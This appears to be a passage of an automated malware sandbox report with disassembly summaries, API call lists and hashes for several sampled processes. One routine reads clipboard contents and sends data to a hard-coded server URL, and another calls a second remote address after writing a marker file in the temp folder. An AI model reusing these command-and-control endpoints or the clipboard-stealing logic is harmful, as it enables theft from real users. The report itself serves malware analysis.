                                                                                                                                                                                                                                                    control_flow_graph 116 1d1d50-1d1d6a 117 1d1d6c-1d1d8a call 1d1db0 116->117 118 1d1da9-1d1daf 116->118 120 1d1d8f-1d1d99 117->120 120->118 121 1d1d9b-1d1da3 lstrcpyW 120->121 121->118
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 001D1DB0: GetDriveTypeW.KERNELBASE(001D1D8F), ref: 001D1DBD
                                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 001D1DA3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DriveTypelstrcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3664088370-0
                                                                                                                                                                                                                                                    • Opcode ID: 9f0cbeaf85bf0b0ba68f9ccdd1d595d4308ec744e374eaa9b274906bf5e9215b
                                                                                                                                                                                                                                                    • Instruction ID: e298bb17745188083742bdce57f69076ed1b613c638a81e5c98a14a7ad50fcbc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f0cbeaf85bf0b0ba68f9ccdd1d595d4308ec744e374eaa9b274906bf5e9215b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBF04476D00208BBCB04DFE8D849BDEB7B8EF44300F0085AAE8199B240E335AB08CB45

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 171 1d1530-1d155c OpenClipboard 172 1d155e-1d1560 171->172 173 1d1565-1d1574 GetClipboardData 171->173 174 1d19f5-1d19f8 172->174 175 1d1576-1d157e CloseClipboard 173->175 176 1d1583-1d159a GlobalLock 173->176 175->174 177 1d159c-1d15a4 CloseClipboard 176->177 178 1d15a9-1d15f1 memset 176->178 177->174 179 1d1602-1d160d 178->179 180 1d16e3-1d16e9 179->180 181 1d1613-1d1627 iswspace 179->181 182 1d171e-1d1735 GlobalUnlock CloseClipboard 180->182 183 1d16eb-1d1701 180->183 184 1d162d-1d1633 181->184 185 1d16c6-1d16cc 181->185 189 1d175f-1d1791 wsprintfW wcscmp 182->189 190 1d1737-1d173e 182->190 183->182 188 1d1703-1d171b wcscat_s 183->188 191 1d1639-1d1653 184->191 192 1d16c4 184->192 186 1d16de 185->186 187 1d16ce-1d16d8 185->187 186->179 187->186 188->182 195 1d179a-1d1874 wsprintfW call 1d1a00 wcstok call 1d1a00 * 2 wcstok * 3 189->195 196 1d1793-1d1795 189->196 190->189 194 1d1740-1d1747 190->194 197 1d1655-1d16a1 wcsncat_s wcscat_s 191->197 198 1d16a4-1d16ab 191->198 192->186 194->189 201 1d1749-1d1750 194->201 209 1d1885-1d188f 195->209 196->174 197->198 198->192 200 1d16ad-1d16bf GlobalUnlock CloseClipboard 198->200 200->174 201->189 203 1d1752-1d1759 201->203 203->189 205 1d19f3 203->205 205->174 210 1d18b8-1d18bf 209->210 211 1d1891-1d18b0 wcscmp 209->211 214 1d19ef-1d19f1 210->214 215 1d18c5-1d18cf 210->215 212 1d18b6 211->212 213 1d18b2 211->213 212->209 213->212 214->174 217 1d18e0-1d18ea 215->217 218 1d18ec-1d190b wcscmp 217->218 219 1d1916-1d1920 217->219 220 1d190d 218->220 221 1d1914 218->221 219->214 222 1d1926-1d1930 219->222 220->221 221->217 224 1d1941-1d194b 222->224 225 1d194d-1d196c wcscmp 224->225 226 1d1977-1d1981 224->226 227 1d196e 225->227 228 1d1975 225->228 226->214 229 1d1983-1d198d 226->229 227->228 228->224 231 1d199e-1d19a8 229->231 232 1d19aa-1d19c9 wcscmp 231->232 233 1d19d4-1d19de 231->233 235 1d19cb 232->235 236 1d19d2 232->236 233->214 234 1d19e0-1d19ec call 1d10a0 233->234 234->214 235->236 236->231
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 001D1554
                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 001D1567
                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 001D1576
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2058664381-0
                                                                                                                                                                                                                                                    • Opcode ID: 01269f55f80f4093f7790e9711fcee96e911aa1ee942c11418324038200df6c0
                                                                                                                                                                                                                                                    • Instruction ID: cfa9ea990c7f70aa885dd194d13a45580bcc139835a23e551ab79b8de7a888d0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01269f55f80f4093f7790e9711fcee96e911aa1ee942c11418324038200df6c0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFC1BBB1D01228BBEF24DB64CC51BADB7B5BF54304F0885DAE44966341EB359B88CFA1

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 001D10B9
                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 001D10CF
                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 001D10FA
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 001D1107
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 001D1114
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • http://185.215.113.66/tcoin.php?s=%s, xrefs: 001D10AD
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 001D10CA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleOpen$wsprintf
                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://185.215.113.66/tcoin.php?s=%s
                                                                                                                                                                                                                                                    • API String ID: 1691607147-1762395284
                                                                                                                                                                                                                                                    • Opcode ID: 7abc1cd99e0717184bfab366ecaa6aad8bf36fe3d741fef8e278cab932ab087a
                                                                                                                                                                                                                                                    • Instruction ID: 940157e0ff3d1a65f5b34a06edb7b214bb0f01d4b93db8bea78afab3e5f3e2ce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7abc1cd99e0717184bfab366ecaa6aad8bf36fe3d741fef8e278cab932ab087a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E013674E8131ABBD725DFA8DD09FAA7778EB04701F1000A9B615662D0D6706B44CB56
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.1968460470.00007FF6D3C31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D3C30000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.1968381551.00007FF6D3C30000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.1968530728.00007FF6D3C4B000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.1968571403.00007FF6D3C4C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.1969575058.00007FF6D41B7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.1969646397.00007FF6D41B9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.1969668483.00007FF6D41C2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.1969710104.00007FF6D41C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.1969732879.00007FF6D41C6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff6d3c30000_2688734187.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                                                                                    • Instruction ID: 5774cb4a784dd527967e3ff0dec20149ca5ec3ba65f9721e392f40e900f8f130
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10B01230908309D8E3003F11DC822EC32346B06780F404032C50C63352DF7D5460CB10

                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0039109A
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 003910B3
                                                                                                                                                                                                                                                    • PathFileExistsW.KERNELBASE(?), ref: 003910C3
                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 003910E9
                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF), ref: 00391105
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000013.00000002.1839634675.0000000000391000.00000020.00000001.01000000.00000010.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839614752.0000000000390000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839652674.0000000000392000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839671902.0000000000393000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839692508.00000000003A0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839711922.00000000003A1000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_390000_1657630034.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                                                                                                                                                    • String ID: %s\feeea3sdfasgsa.txt$%temp%$^Gv
                                                                                                                                                                                                                                                    • API String ID: 750032643-3553453870
                                                                                                                                                                                                                                                    • Opcode ID: f1ef35cd2bb79e667c314cdb1495eda4e4c2a2020e72e80e63c7fef91d067388
                                                                                                                                                                                                                                                    • Instruction ID: 9c08ff7527283b97ee6cd1dd23205c0fc820d13573b1c51a4c772fa53fe4a284
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1ef35cd2bb79e667c314cdb1495eda4e4c2a2020e72e80e63c7fef91d067388
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E01DFB4900308BBDB228B209C0AFE6333CAB04704F004695B718A21D1DAB15AC8CFA5

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00391015
                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0039102B
                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00391056
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00391063
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00391070
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 00391026
                                                                                                                                                                                                                                                    • http://91.202.233.141/IBSTSWSONL, xrefs: 00391009
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000013.00000002.1839634675.0000000000391000.00000020.00000001.01000000.00000010.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839614752.0000000000390000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839652674.0000000000392000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839671902.0000000000393000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839692508.00000000003A0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839711922.00000000003A1000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_390000_1657630034.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleOpen$wsprintf
                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://91.202.233.141/IBSTSWSONL
                                                                                                                                                                                                                                                    • API String ID: 1691607147-3072516501
                                                                                                                                                                                                                                                    • Opcode ID: e140dfcc1c3b73fc88a961b752f4769068c17c9b4ee89efdd71bae924697b351
                                                                                                                                                                                                                                                    • Instruction ID: 7ea795f2c2421c8a06cf10c1e3041c9250b89b39e53581b341b4ac96f6b1a0be
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e140dfcc1c3b73fc88a961b752f4769068c17c9b4ee89efdd71bae924697b351
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F014474EC0306BBDB26DF64DD0AFAA777CEB04701F1000A9B605A72C0D6716B44CB65

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 10 391120-391138 Sleep call 391080 13 39113a call 391000 10->13 14 39113f-391142 10->14 13->14
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00391128
                                                                                                                                                                                                                                                      • Part of subcall function 00391080: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0039109A
                                                                                                                                                                                                                                                      • Part of subcall function 00391080: wsprintfW.USER32 ref: 003910B3
                                                                                                                                                                                                                                                      • Part of subcall function 00391080: PathFileExistsW.KERNELBASE(?), ref: 003910C3
                                                                                                                                                                                                                                                      • Part of subcall function 00391000: wsprintfW.USER32 ref: 00391015
                                                                                                                                                                                                                                                      • Part of subcall function 00391000: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0039102B
                                                                                                                                                                                                                                                      • Part of subcall function 00391000: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00391056
                                                                                                                                                                                                                                                      • Part of subcall function 00391000: InternetCloseHandle.WININET(?), ref: 00391063
                                                                                                                                                                                                                                                      • Part of subcall function 00391000: InternetCloseHandle.WININET(00000000), ref: 00391070
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000013.00000002.1839634675.0000000000391000.00000020.00000001.01000000.00000010.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839614752.0000000000390000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839652674.0000000000392000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839671902.0000000000393000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839692508.00000000003A0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000013.00000002.1839711922.00000000003A1000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_390000_1657630034.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleOpenwsprintf$EnvironmentExistsExpandFilePathSleepStrings
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2566316890-0
                                                                                                                                                                                                                                                    • Opcode ID: b108b18d4e33ea4ed5673ec2f1ed19e9069b7f407b324d9577226e875e644545
                                                                                                                                                                                                                                                    • Instruction ID: cfb3b1efbaf3211e0aa8ce46d25cc0d73108194d1a8f938c469d5a781a99cc91
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b108b18d4e33ea4ed5673ec2f1ed19e9069b7f407b324d9577226e875e644545
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60C04C3114825B66AA5272B26C0A727369C5B00791F404463B585E86D7DD87D461A4B2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000014.00000002.1957566896.00007FFE7DC5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DC5D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_7ffe7dc5d000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4da67553a64567ef33b6bce3b690866f8458b5719c6d716a849590fb6d8fd262
                                                                                                                                                                                                                                                    • Instruction ID: c59456deb7bac550d8ce77ed8c4ac68c2f5a2ec5d5e01f6873f439dcea6db95f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4da67553a64567ef33b6bce3b690866f8458b5719c6d716a849590fb6d8fd262
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A11517150CF088F9BA8EF1DE48595677E0FB98320B10465FD459C7665D731E882CBC2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000014.00000002.1960036128.00007FFE7DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD70000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_7ffe7dd70000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6cd3c5edcfc4eabbb544dbac2731316c486421f419c4adbba40ab582c5cd9bae
                                                                                                                                                                                                                                                    • Instruction ID: 28f3797459fa2f05538c412308d8801ec7d71fb6bb4550837be9e9851e3a97c1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cd3c5edcfc4eabbb544dbac2731316c486421f419c4adbba40ab582c5cd9bae
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F01677111CB0C4FD754EF0CE451AA9B7E0FB95364F10066EE58AC3661D736E891CB45
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000014.00000002.1960659146.00007FFE7DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE40000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_7ffe7de40000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6f31e2e9d96ee56206d3bee4f0a6ff2c4067734e4d2e1808545a3bb3670a168e
                                                                                                                                                                                                                                                    • Instruction ID: e6495e7f2e78e2e8995756140b1443200f02f8ecec1b80811ec64984f1c848f8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f31e2e9d96ee56206d3bee4f0a6ff2c4067734e4d2e1808545a3bb3670a168e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EF0A03131CF044FE748EE2DE8496A6B3E1FBA8311F10462FE44AC3661DA25E8818782
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000014.00000002.1960659146.00007FFE7DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE40000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_7ffe7de40000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ac411e2573e8395dcc16cfa2166db8bf675480d51829e9aecb55cd4f4e282584
                                                                                                                                                                                                                                                    • Instruction ID: 575bf8fc5e00c81abcad8d9415bd173d0619b0f92c750921cd722f77c8e0aef1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac411e2573e8395dcc16cfa2166db8bf675480d51829e9aecb55cd4f4e282584
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CF05E32A0D9458FD765EA4CE4418A873E0EF4533071504FBE169C7573EA25EC418740
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000014.00000002.1960659146.00007FFE7DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE40000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_7ffe7de40000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2cb8a47761ad2d6a3e7ccb73ee48412dd6e2ad61d5c0110ddbe68ed951248188
                                                                                                                                                                                                                                                    • Instruction ID: d1dfef0c30bbe900d3a3935ca29887af7078ccdc15117ab6b8a4f2a0ce71b13a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cb8a47761ad2d6a3e7ccb73ee48412dd6e2ad61d5c0110ddbe68ed951248188
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FF08C32A0D5088FD766EB48E4419E877E0EF4533071904F7E119CB463EA2AEC41C740

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 158 9e1840-9e1852 call 9e2000
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 03acec3e3a68d67e76334f55a92a31785c36fc2eb390d96455b8251fd9f555ae
                                                                                                                                                                                                                                                    • Instruction ID: d646614227e6504ef912d6df150d376b9c7e3fff89536967588c08f67a4e38db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03acec3e3a68d67e76334f55a92a31785c36fc2eb390d96455b8251fd9f555ae
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22B0927090920CE78B08EB8AE91296EB7AEDB85311B1002EDF80C53341DA722F1096D9

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(MSIE,00000001,00000000,00000000,00000000), ref: 009E13B9
                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(?,00000000), ref: 009E1445
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 009E1470
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
